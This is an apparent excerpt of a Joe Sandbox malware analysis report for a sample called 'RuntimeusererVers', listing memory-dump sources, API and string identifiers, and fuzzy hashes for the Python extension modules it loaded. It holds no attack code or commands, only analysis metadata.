                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ModuleType_$Arg_$KeywordsPositional
                                                                                                                                                                                                                                          • String ID: SimpleQueue
                                                                                                                                                                                                                                          • API String ID: 4181285317-3395603730
                                                                                                                                                                                                                                          • Opcode ID: d95f10c0e63c29ebf7223734b2b99d6cd48966227eee888d90296c3057f4ddec
                                                                                                                                                                                                                                          • Instruction ID: 050103054e66917a1ab84cec583c85d24063be7b263fa1d865110420c4af5d30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d95f10c0e63c29ebf7223734b2b99d6cd48966227eee888d90296c3057f4ddec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A621FA66B19F4AD1EB548F15EC9016927B1EFA8FE0F485232EA4F47368DE2CF4558700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_$Err_ExceptionFromModuleObjectSpecTypeType_With
                                                                                                                                                                                                                                          • String ID: Empty$Exception raised by Queue.get(block=0)/get_nowait().$_queue.Empty
                                                                                                                                                                                                                                          • API String ID: 1138974572-1946099957
                                                                                                                                                                                                                                          • Opcode ID: b734e69cca9964b11ba62dbc2179316181713867e2c5af3e713d8057d29c683d
                                                                                                                                                                                                                                          • Instruction ID: 6b483747ae5a2124386206ce49f4452e2a58c15f194cbe29b591aa727c268848
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b734e69cca9964b11ba62dbc2179316181713867e2c5af3e713d8057d29c683d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8019235B29F4B92EB058B39EC5457A23A0AF69BE4F445231D91F46758DE2CF054C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format
                                                                                                                                                                                                                                          • String ID: %.200s() takes %.8s %zd positional argument%.1s (%zd given)$__init__$aiohttp._http_parser.HttpRequestParser.__init__$at least$at most
                                                                                                                                                                                                                                          • API String ID: 376477240-514749419
                                                                                                                                                                                                                                          • Opcode ID: 8d8a400896e0d02cba68e875e0fc9c0864371ca79c7edb7425423cc71ca58b08
                                                                                                                                                                                                                                          • Instruction ID: 7aa0b5de795db6a017288c16b67f0e1d50955f735628c951adf386b5ff12d150
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d8a400896e0d02cba68e875e0fc9c0864371ca79c7edb7425423cc71ca58b08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B31E732A28F8185EB109B55FC402AA73A4FB887A8F544735EE9D53BA4DF7CE2558700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$ClearDeallocExceptionMatchesStringUnraisableWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 36411185-0
                                                                                                                                                                                                                                          • Opcode ID: 52ff016b3cb9e6ef17a48fb3e52434ee81d154689e2277ec1d5754a3a2cdce66
                                                                                                                                                                                                                                          • Instruction ID: 81e608620b3994a8b0b111e1325a3619be6a5888b2359331c205a2df46c4f2f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52ff016b3cb9e6ef17a48fb3e52434ee81d154689e2277ec1d5754a3a2cdce66
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16216221A2DF42C5EB548B2AAC0527973A4AF58BE4F084234DE5D07365DE7DF645C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_List_StringThread_allocate_lock
                                                                                                                                                                                                                                          • String ID: can't allocate lock
                                                                                                                                                                                                                                          • API String ID: 214698565-1504453919
                                                                                                                                                                                                                                          • Opcode ID: fcafceefddd0f88e419e95cf8ef09139d22d98c1ab56a74a1cb33c6b488a13f5
                                                                                                                                                                                                                                          • Instruction ID: 8becd4c820a83b8ab2edf5c6b3d734d7c5e5363cef46f9847e120af36bba1724
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcafceefddd0f88e419e95cf8ef09139d22d98c1ab56a74a1cb33c6b488a13f5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5101D721B29F0A81EB599B35EC0833922F1AF68FE5F140239D90F46258EF3CB0458300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Dict_HashItem_Known
                                                                                                                                                                                                                                          • String ID: aiohttp._http_parser.parser_error_from_errno
                                                                                                                                                                                                                                          • API String ID: 680588069-345607510
                                                                                                                                                                                                                                          • Opcode ID: 504395eb2901374e79eead075dd460ce1a34459106cea8cebbd9e2f38413aef4
                                                                                                                                                                                                                                          • Instruction ID: c013a946de0665cf1b097ff006806818b2eab5ad5712d4a84cf685bed3c692fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 504395eb2901374e79eead075dd460ce1a34459106cea8cebbd9e2f38413aef4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9311921A2EF5281FB258B1AAC5413C63A1BF95BF0F184736DE1E173A4EE6CF5428300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocErr_Format
                                                                                                                                                                                                                                          • String ID: Expected %.16s, got %.200s$aiohttp._http_parser.RawRequestMessage.__setstate_cython__$tuple
                                                                                                                                                                                                                                          • API String ID: 186121651-2336066056
                                                                                                                                                                                                                                          • Opcode ID: 5d639222a8506a8daee07d4916c757f1ad2676717ea7f0bcdfc8147f161a23cc
                                                                                                                                                                                                                                          • Instruction ID: add50b58ec17c19a7b591a2f9f5f4fc6034cd32f8acb200ca8e5313335c1e9f5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d639222a8506a8daee07d4916c757f1ad2676717ea7f0bcdfc8147f161a23cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3401D371A28D47C1EB559B91EC414E823A0AB84BE4F881332ED0D23760DF3CF6858311
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638693744.00007FF81EC61000.00000020.00000001.01000000.0000006F.sdmp, Offset: 00007FF81EC60000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638664892.00007FF81EC60000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638782154.00007FF81EC62000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638844829.00007FF81EC64000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec60000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Import$Capsule_DeallocImport_Module
                                                                                                                                                                                                                                          • String ID: charset_normalizer.md__mypyc$charset_normalizer.md__mypyc.init_charset_normalizer___md
                                                                                                                                                                                                                                          • API String ID: 1394619730-824592145
                                                                                                                                                                                                                                          • Opcode ID: 822d8f28c43c026d73328d46273051929917987313d3cc2e25b5f642087e390d
                                                                                                                                                                                                                                          • Instruction ID: 9ea983f313daf6c8fbc3e2cf1f9adae540dcea0aebef85f11a03d879be3e894a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 822d8f28c43c026d73328d46273051929917987313d3cc2e25b5f642087e390d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4E01A20F2ED43C1EF1C9F21BC4417222E26F9CFA1F884634C51D02360EE2CB9458310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638905947.00007FF81EC71000.00000020.00000001.01000000.0000006E.sdmp, Offset: 00007FF81EC70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638872780.00007FF81EC70000.00000002.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638949902.00007FF81EC72000.00000002.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639016964.00007FF81EC73000.00000004.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639056414.00007FF81EC74000.00000002.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$BuildCreateErr_FromRestoreSaveSequentialSizeUuidValue_Windows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 170011378-0
                                                                                                                                                                                                                                          • Opcode ID: 6b100998d7ddf39f079f4caf39b09ff1818fa8c7589a3d9e3de9bb19b7a62f6b
                                                                                                                                                                                                                                          • Instruction ID: d68e5e80b331501bda2506aea34bdb42ffc7a016c0250282789713e5dc1a5925
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b100998d7ddf39f079f4caf39b09ff1818fa8c7589a3d9e3de9bb19b7a62f6b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12012161F28E4682EB149B25EC9943963A3FFC9BE0F544231EA5E87658DF3CF9458700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Object_$ClearDeallocRefsThread_free_lockThread_release_lockTrackWeak
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 778659985-0
                                                                                                                                                                                                                                          • Opcode ID: af7311f06d4814466a90193bbfc4a352b295f919e9586dec9b625acca272069e
                                                                                                                                                                                                                                          • Instruction ID: 1ce0a5c4d3462f8d04e1dab146dc50dc92362498475b7494a3cbb010e3c0b83b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af7311f06d4814466a90193bbfc4a352b295f919e9586dec9b625acca272069e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F01D625B28B4A82EB199F69E95423923A0EFA5FE4F485130EE0B02258DE3CE4948340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECADB8B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyThreadState_Get.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5B7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyErr_Fetch.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5E8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: _PyObject_GetDictPtr.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5F5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyObject_Not.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF6C2
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyErr_Restore.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF702
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyFrame_New.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF95D
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyTraceBack_Here.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF972
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: _Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF986
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: _Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF99A
                                                                                                                                                                                                                                          • PyErr_Occurred.PYTHON311 ref: 00007FF81ECADB93
                                                                                                                                                                                                                                          • PyErr_SetString.PYTHON311 ref: 00007FF81ECADBAF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Dealloc$Object_$Back_DictFetchFrame_HereOccurredRestoreState_StringThreadTrace
                                                                                                                                                                                                                                          • String ID: init aiohttp._http_parser
                                                                                                                                                                                                                                          • API String ID: 3276581674-588849299
                                                                                                                                                                                                                                          • Opcode ID: a994a93ea158f24439403f1b409dc0ec2f89769cb72c7205be7e8e4c00f7e9ef
                                                                                                                                                                                                                                          • Instruction ID: 66c471bc788a7be6ab5171362c030f915d3aa16bb04615ccba48240ef9172d62
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a994a93ea158f24439403f1b409dc0ec2f89769cb72c7205be7e8e4c00f7e9ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6111222A29F4682FB619B15FC4877563A0AB84BF9F480336CD0D872A0DE7CB586C301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format
                                                                                                                                                                                                                                          • String ID: %.200s() takes %.8s %zd positional argument%.1s (%zd given)$_websocket_mask_cython$exactly
                                                                                                                                                                                                                                          • API String ID: 376477240-2163499689
                                                                                                                                                                                                                                          • Opcode ID: 0df714275a96b3e6a245419998559884a9f3e4e7d85dd69463df2028d6d72414
                                                                                                                                                                                                                                          • Instruction ID: a12958205b40fa72af2aca83a5b5d0d15c774be0107ca9679ccf74481dcb036b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0df714275a96b3e6a245419998559884a9f3e4e7d85dd69463df2028d6d72414
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE0E575928F4691EB008B44FD40AA9B3A4FB857A8F81123AD58C03734EF3CF119C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Entermemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2581898777-0
                                                                                                                                                                                                                                          • Opcode ID: 90d3af1b977ed9c31608c20a1cd1b927ed61e90ec1c67716f0027cde6654c5a2
                                                                                                                                                                                                                                          • Instruction ID: 651a6665fa3a48b224fba8e2aaa335b5c6a8086e06ee0bd254908aadb997bc98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90d3af1b977ed9c31608c20a1cd1b927ed61e90ec1c67716f0027cde6654c5a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A413B23A18F8587E7558F25E5006AAA360FB99B94F05A321DF8F13751EF38E2E5C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF81DF30D58), ref: 00007FF81DF2E731
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF81DF30D58), ref: 00007FF81DF2E793
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF81DF30D58), ref: 00007FF81DF2E7E0
                                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF81DF30D58), ref: 00007FF81DF2E809
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Entermalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3130977980-0
                                                                                                                                                                                                                                          • Opcode ID: 657bd97a248e0907a2f55b6056d01d21e16768e8bf09d977d51afe3b81ec960e
